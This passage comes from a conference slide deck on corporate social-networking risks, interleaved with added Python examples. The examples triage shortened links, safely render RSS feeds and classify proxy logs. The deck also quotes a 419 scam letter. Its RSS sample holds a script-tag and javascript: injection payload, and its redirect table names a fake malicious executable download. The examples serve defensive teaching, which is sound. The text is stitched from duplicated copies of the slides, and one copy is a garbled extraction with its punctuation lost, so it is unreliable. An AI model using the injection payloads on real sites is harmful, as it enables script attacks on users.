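lure did. Redirects come from a constructed table so it runs offline; a live
resolver would follow HTTP 30x responses with HEAD requests instead."""
import re
from urllib.parse import urlparse

SHORTENERS = {"bit.ly", "tr.im", "tinyurl.com"}  # shorteners named on the slide
# Assumption: brand keyword -> domains that legitimately carry that brand.
LEGITIMATE_BRAND_DOMAINS = {"facebook": {"facebook.com"}, "adobe": {"adobe.com"}}
MAX_HOPS = 5
EXECUTABLE_SUFFIX = re.compile(r"\.(exe|scr|msi|zip)$", re.IGNORECASE)

# Constructed redirect table (constructed hosts) standing in for live 30x replies.
FAKE_REDIRECTS = {
    "http://bit.ly/abc123": "http://tinyurl.com/xyz",
    "http://tinyurl.com/xyz": "http://facebook-login.example/update/adobe-flash.exe",
    "http://bit.ly/ok1": "https://www.adobe.com/flash",
    "http://bit.ly/loop1": "http://bit.ly/loop2",  # redirect loop
    "http://bit.ly/loop2": "http://bit.ly/loop1",
}


def host_of(url):
    """Lower-cased hostname, or '' when the URL has none."""
    return (urlparse(url).hostname or "").lower()


def is_under(host, domain):
    """True when host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def expand(url, redirects=FAKE_REDIRECTS, max_hops=MAX_HOPS):
    """Follow the (simulated) redirect chain, giving up after max_hops."""
    chain = [url]
    while chain[-1] in redirects and len(chain) <= max_hops:
        chain.append(redirects[chain[-1]])
    return chain


def triage(url, redirects=FAKE_REDIRECTS):
    """Expand the link and return findings plus an allow/warn/block verdict."""
    chain = expand(url, redirects)
    final = chain[-1]
    final_host = host_of(final)
    findings = []

    if any(is_under(host_of(u), s) for u in chain[:-1] for s in SHORTENERS):
        findings.append(f"shortened: destination hidden behind {len(chain) - 1} redirect(s)")
    if len(chain) > MAX_HOPS:
        findings.append("redirect chain exceeds MAX_HOPS (loop or evasion)")
    if any(is_under(final_host, s) for s in SHORTENERS):
        findings.append("final destination never resolved past a shortener")

    # A brand name anywhere in a host that is not under the brand's own domain
    # catches both facebook-login.example and login.facebook.com.evil.example.
    for brand, legit in LEGITIMATE_BRAND_DOMAINS.items():
        if brand in final_host and not any(is_under(final_host, d) for d in legit):
            findings.append(f"lookalike host {final_host!r} borrows brand {brand!r}")

    if EXECUTABLE_SUFFIX.search(urlparse(final).path):
        findings.append("destination serves an executable download")
    if urlparse(final).scheme != "https":
        findings.append("destination is not HTTPS")

    severe = ("lookalike", "executable", "exceeds", "never resolved")
    if any(word in f for f in findings for word in severe):
        verdict = "block"
    elif findings:
        verdict = "warn"
    else:
        verdict = "allow"
    return {"chain": chain, "final": final, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for link in ("http://bit.ly/abc123", "http://bit.ly/ok1", "http://bit.ly/loop1"):
        print(triage(link)["verdict"], triage(link)["findings"])
```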
Risks and challenges (cont.)
• More on phishing – social networks are a target-rich environment
Risks and challenges (cont.)
• More on phishing – social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……" – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Risks and challenges (cont.)
• Reputation – Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation – Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft – Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)
• Failures in the use of Social Media – most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" – Gartner
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times." – Michael Scott from The Office
• Productivity – Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)
• Technical Integration – Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
Risks and challenges (cont.)
• Information hoarding – In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification – Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  – Or alternatively (see http://en.wikipedia.org/wiki/Beckstrom's_law)
Risks and challenges (cont.)
• Litigation issues – Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
– Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
– Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
What is next in the world of social networking
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source: eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social Networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" – Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go" – Biz Stone, Co-founder of Twitter
Q&A
Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix
• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist, A special report on social networking (January 30, 2010)
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site: http://www.bcs.org/socialmedia
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                     Monthly Active Users
1     FarmVille                82,580,911
2     Static FBML              46,827,021
3     Birthday Cards           41,904,049
4     Café World               30,032,716
5     Facebook for iPhone      29,438,848
6     Texas HoldEm Poker       28,332,917
7     Slide FunSpace           25,630,033
8     Happy Aquarium (BETA)    24,915,971
9     Mafia Wars               24,704,179
10    Causes                   24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors — a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS", i.e. XSS) in AJAX, e.g. the "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScript into RSS feeds to generate an attack on the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — fails to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
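The "RSS/Atom injection" and "client-side validation" items above share one root cause: feed text produced by a third party is dropped into a page without server-side escaping. The following is an added example, not code from this ISACA deck or from the Net-Square paper it cites. It parses a constructed RSS document (the feed, the example.invalid host and the function names are all made up for this illustration), shows the vulnerable rendering pattern beside a hardened one, and restricts link schemes so a non-http(s) link cannot reach the page.

```python
"""Safe versus unsafe rendering of untrusted RSS items (added example, not from the deck)."""
import html
import xml.etree.ElementTree as ET

# Constructed sample feed: one benign item and one whose title, link and
# description carry markup and a script tag, the feed-injection case.
# (The XML-escaped &lt;script&gt; becomes a literal <script> after parsing.)
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0">
  <channel>
    <title>Example status feed</title>
    <item>
      <title>Scheduled maintenance</title>
      <link>https://example.invalid/status/1</link>
      <description>Site will be read-only at 02:00 UTC.</description>
    </item>
    <item>
      <title>Free gift &lt;b&gt;today&lt;/b&gt;</title>
      <link>javascript:alert(1)</link>
      <description>&lt;script&gt;alert(1)&lt;/script&gt;Click here</description>
    </item>
  </channel>
</rss>
"""

SAFE_SCHEMES = ("http://", "https://")


def safe_href(url):
    """Allow only absolute http(s) links; javascript:, data: and friends become '#'."""
    url = (url or "").strip()
    return url if url.lower().startswith(SAFE_SCHEMES) else "#"


def parse_items(rss_text):
    """Extract title/link/description from every <item>.

    Note: for XML from an untrusted source the deck's "XML poisoning" item
    also applies; parse with the defusedxml package (not stdlib) to block
    entity-expansion attacks. Plain ElementTree is used here so the example
    runs without third-party dependencies.
    """
    root = ET.fromstring(rss_text)
    return [
        {
            "title": item.findtext("title", default=""),
            "link": item.findtext("link", default=""),
            "description": item.findtext("description", default=""),
        }
        for item in root.iter("item")
    ]


def render_unsafe(items):
    """The vulnerable pattern: feed text concatenated straight into HTML."""
    return "".join(
        f'<li><a href="{i["link"]}">{i["title"]}</a>: {i["description"]}</li>'
        for i in items
    )


def render_safe(items):
    """Hardened: every text field HTML-escaped, link scheme restricted."""
    return "".join(
        f'<li><a href="{html.escape(safe_href(i["link"]), quote=True)}">'
        f'{html.escape(i["title"])}</a>: {html.escape(i["description"])}</li>'
        for i in items
    )


if __name__ == "__main__":
    items = parse_items(SAMPLE_RSS)
    print("UNSAFE:", render_unsafe(items))
    print("SAFE:  ", render_safe(items))
```

The escaping happens on the server, at the point where the feed is turned into markup, so it holds regardless of what the client-side AJAX code does with the response. Escaping at output time (rather than trying to "clean" the feed at input time) is the part that generalises: the same `html.escape` call protects any text of unknown origin.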
www.isaca.org 37
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
www.isaca.org 38
Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are only starting to appear, often as plug-ins for social media tools
• Attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc. – which hides the real destination from the user
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment
www.isaca.org 41
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22-year-old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…" – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would with other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" — Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1,000 times." – Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence – limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
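The firewall point above (identify the application, not the port) and the URL-shortening point on slide 39 can both be checked from ordinary web proxy logs before any next-generation firewall is bought. The following is an added example, not code from the deck or from any firewall vendor: it reads constructed proxy log lines (timestamp, user, method, target, status; the users, hosts and the signature table are all invented for this illustration), classifies each request by the application's hostname regardless of the port used, contrasts that with what a port-only view would have seen, and flags hits on the shortener domains the deck names. Real NGFW products use traffic signatures and SSL inspection; this only uses the hostname a proxy already records.

```python
"""Application-aware classification of proxy log lines (added example, not from the deck)."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed proxy log (not real traffic). Note the social-network requests
# on 443 via CONNECT, on 80, and one deliberately on a non-standard port.
SAMPLE_LOG = """\
2010-03-15T09:01:12Z alice CONNECT www.facebook.com:443 200
2010-03-15T09:01:40Z alice GET http://apps.facebook.com/farmville/ 200
2010-03-15T09:02:05Z bob GET http://twitter.com/statuses/home 200
2010-03-15T09:02:30Z bob GET http://bit.ly/1a2b3c 301
2010-03-15T09:03:00Z carol GET http://intranet.example.invalid:8080/wiki/Main 200
2010-03-15T09:03:21Z carol CONNECT www.linkedin.com:8443 200
2010-03-15T09:04:02Z dave GET http://tinyurl.com/xyz 301
"""

# Hypothetical application signature table: application -> registered domains.
APP_SIGNATURES = {
    "facebook": ("facebook.com", "fbcdn.net"),
    "twitter": ("twitter.com",),
    "linkedin": ("linkedin.com",),
}
# Shortener services named on slide 39; their destination is hidden from the user.
URL_SHORTENERS = ("bit.ly", "tr.im", "tinyurl.com")

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def host_and_port(method, target):
    """Return (hostname, port) from a CONNECT 'host:port' or an absolute URL."""
    parts = urlsplit(target if "://" in target else "//" + target)
    default = 443 if (method == "CONNECT" or parts.scheme == "https") else 80
    return parts.hostname, parts.port or default


def matches(host, suffixes):
    """True if host is one of the suffixes or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(host):
    """Application name from the hostname, independent of port or scheme."""
    for app, suffixes in APP_SIGNATURES.items():
        if matches(host, suffixes):
            return app
    return "other"


def analyse(log_text):
    """Summarise a log: counts by application, counts by port, shortener hits."""
    by_app, by_port, shortener_hits = Counter(), Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the run
        _ts, user, method, target, _status = m.groups()
        host, port = host_and_port(method, target)
        by_app[classify(host)] += 1
        by_port[port] += 1
        if matches(host, URL_SHORTENERS):
            shortener_hits.append((user, host))
    return {"by_app": by_app, "by_port": by_port, "shortener_hits": shortener_hits}


if __name__ == "__main__":
    summary = analyse(SAMPLE_LOG)
    print("by application:", dict(summary["by_app"]))
    print("by port:       ", dict(summary["by_port"]))
    print("shortener hits:", summary["shortener_hits"])
```

The `by_port` counter is the "historical firewall" view: it lumps Facebook, Twitter and the shortener lookups together as port 80 traffic and cannot tell the LinkedIn session on 8443 from anything else. The `by_app` counter is the view the slide asks for. A suffix match on the registered domain is used deliberately: a plain substring test would let a look-alike host such as `facebook.com.example.invalid` pass as Facebook.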
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle" – http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" — Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj, et al. "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
